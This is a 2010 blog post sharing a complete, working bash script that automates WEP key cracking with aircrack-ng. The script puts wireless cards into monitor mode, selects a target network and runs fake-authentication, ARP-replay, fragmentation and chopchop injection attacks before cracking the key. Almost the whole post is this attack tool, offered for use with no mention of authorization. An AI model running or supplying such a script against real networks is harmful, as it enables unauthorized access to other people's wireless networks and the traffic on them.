WEP Cracking with aircrack

 Software  Add comments
Jul 102010
 

I thought I would post my bash wep cracking script. I made this on the backtrack 4 final linux distro, which is ubuntu, it utilizes aircrack-ng and a sub directory call data.

This script would be most of interest to people who are using multiple wireless interfaces to capture. It allows you you test each cards reception and specify which card is to do the injection and which are simply there to listen.

It implements all aircrack attacks against WEP hubs and I have success using all.

If I get interested in WPA cracking I’ll post another script.

kill_air() {
	kill `ps -A | grep air | grep -o -E '^[0-9]+'`
}

airodump_options="-a --write data/stations --beacons --output-format csv"
cap=`iwconfig | grep -o -E '^\w+' | sed 's/$/,/g'`
cap=`echo $cap | sed 's/,$//' | sed 's/ //g'`
clear
echo "Trips WEP cracking script"
echo -n "http://www.somedodgywebsite.com/wp/software/wep-cracking-with-aircrack/"
airmon-ng
echo "Select injection interface"
select opt in `echo $cap | sed 's/,/ /g'`
do
	inj=$opt
	MAC=`ifconfig | grep "$inj" | grep -o -E '[0-9A-F-]+[ ]+$' | cut -c 1-17 | sed 's/-/:/g'`
	echo "DEBUG:MAC:$MAC"
	break
done

echo ""; echo "Select your best receiver"
select opt in `echo $cap | sed 's/,/ /g'`
do
	TRUMPET=$opt
	break
done
echo ""; echo -n "Just WEP? (y/n)[y] "
read answer
if [ "$answer" != "n" ]
then
	airodump_options="$airodump_options --encrypt WEP"
fi
echo ""; echo -n "Select channel (1-13)[all] "
read answer
if [ "$answer" != "" ]
then
	channel_options="--channel $answer"
fi
echo ""; echo "Setting capture cards"
for int in `echo $cap | sed 's/,/ /g'`
do
	ifconfig $int down
	iwconfig $int rate 1M
	iwconfig $int mode monitor
	iwconfig $int key off >/dev/null 2>&1
	iwconfig $int txpower 16 >/dev/null 2>&1
	iwconfig $int power off >/dev/null 2>&1
done
echo -n "Check individual card reception (y/n)[n] "
read answer
if [ "$answer" = "y" ]
then
	y=1
	for int in `echo $cap | sed 's/,/ /g'`
	do
		terminator --geometry 1200x200+1+$y --command "airodump-ng $airodump_options $channel_options $int" &
		y=$(($y+150))
	done
	echo -n "Happy with individual reception (y/n)[y] "
	read answer
	if [ "$answer" = "n" ]
	then
		exit
	fi
fi
rm data/stations*
airodump-ng $airodump_options $channel_options $cap
echo -n "Found suitable network to attack?(y/n)[y] "
read answer
if [ "$answer" = "n" ]
then
	echo "Bummer :("
	exit
fi
echo "Select ESSID target"
select target in `awk -F , '{if (NR>2) print $14}' data/stations-01.csv | grep -E '\w'`
do
	ESSID=$target
	break
done
BSSID=`grep -m 1 "$ESSID" data/stations-01.csv | awk -F , '{print $1}'`
CHANNEL=`grep -m 1 "$ESSID" data/stations-01.csv | awk -F , '{print $4}' | grep -o -E '[0-9]+'`
ENCRYPT=`grep -m 1 "$ESSID" data/stations-01.csv | awk -F , '{print $6}'`
echo ""
echo "ESSID = $ESSID"
echo "BSSID = $BSSID"
echo "Channel = $CHANNEL"
echo "Encryption = $ENCRYPT"
echo "Injection Interface = $inj"
echo "Injection MAC = $MAC"
echo "Best Reception Interface = $TRUMPET"
echo ""
echo -n "Proceed with attack? (y/n)[y] "
read answer
if [ "$answer" = "n" ]
then
	echo "Goobye :)"
	exit
fi
echo "Setting interfaces for attack"
for int in `echo $cap | sed 's/,/ /g'`
do
	ifconfig $int down
	iwconfig $int rate 1M
	iwconfig $int mode monitor
	iwconfig $int power off >/dev/null 2>&1
	iwconfig $int channel $CHANNEL
done
ifconfig $inj down
#ignore : Tests have shown no difference between 1M and 54M on ar9170usb
iwconfig $inj rate 1M
iwconfig $inj channel $CHANNEL
echo ""; echo "-> aireplay-ng --fakeauth=60 -a $BSSID -e $ESSID -q 10 -h $MAC -i $TRUMPET $inj"
echo "Associating..."
terminator --geometry 1200x100+1+1 --command "aireplay-ng --fakeauth=60 -a $BSSID -e $ESSID -q 10 -h $MAC -i $TRUMPET $inj" &
echo ""; echo "Waiting 10 seconds for association..."
sleep 10
echo "If association failed start it again in another console using the aforementioned command"
echo "Press enter to continue with cracking"
read answer
echo "Choose attack method"
select attack in `echo "CHOPCHOP" & echo "ARP" & echo "Fragment"`; do echo "$attack Selected"; echo ""; break; done
if [ "$attack" = "Fragment" ]
then
	rm fragment*.xor
	rm replay_src*.cap
	echo ""
	echo "-> aireplay-ng --fragment -a $BSSID -e $ESSID -h $MAC $inj"
	aireplay-ng --fragment -a $BSSID -e $ESSID -h $MAC $inj
	echo ""
	echo "-> packetforge-ng --arp -a $BSSID -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment* -w data/$ESSID.pkt"
	packetforge-ng --arp -a $BSSID -h $MAC -k 255.255.255.255 -l 255.255.255.255 -y fragment* -w data/$ESSID.pkt
	echo ""
	echo "-> aireplay-ng --interactive -F -r data/$ESSID.pkt -x 200 -h $MAC -b $BSSID $inj"
	aireplay-ng --interactive -F -r data/$ESSID.pkt -x 100 -h $MAC -b $BSSID $inj &
	echo ""
	echo "-> airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap"
	terminator --geometry 1200x300+1+100 --command "airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap" &
	echo ""
	echo "-> aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs"
	terminator --geometry 1200x200+1+300 --command "echo 'Cracking stating in 10 seconds' ; sleep 10 ; aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs ; echo 'Press enter to exit' ; read answer ; echo ' $ESSID' >> data/$ESSID.key.txt"
	kill_air
fi
if [ "$attack" = "ARP" ]
then
	echo "-> aireplay-ng --arpreplay -a $BSSID -e $ESSID -h $MAC -x 100 -i $TRUMPET $inj"
	aireplay-ng --arpreplay -a $BSSID -e $ESSID -h $MAC -x 100 -i $TRUMPET $inj &
	echo "-> airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap"
	terminator --geometry 1200x300+1+100 --command "airodump-ng --ivs --write data/$ESSID --bssid $BSSID --channel $CHANNEL $cap" &
	echo "-> aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs"
	terminator --geometry 1200x200+1+300 --command "echo 'Press enter to start cracking, you must have started sending packets.' ; read answer ; aircrack-ng -P2 -b $BSSID -l data/$ESSID.key.txt data/$ESSID*.ivs ; echo 'Press enter to exit' ; read answer ; echo ' $ESSID' >> data/$ESSID.key.txt"
	kill_air
fi

if [ "$attack" = "CHOPCHOP" ]
then
	echo ""; echo "-> aireplay-ng --chopchop -a $BSSID -e $ESSID -h $MAC -i $TRUMPET $inj"
	aireplay-ng --chopchop -a $BSSID -e $ESSID -h $MAC -i $TRUMPET $inj
fi
echo ""; echo "These 'air*' processes are still running:"
echo `ps -A | grep air`
Share

 Leave a Reply

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>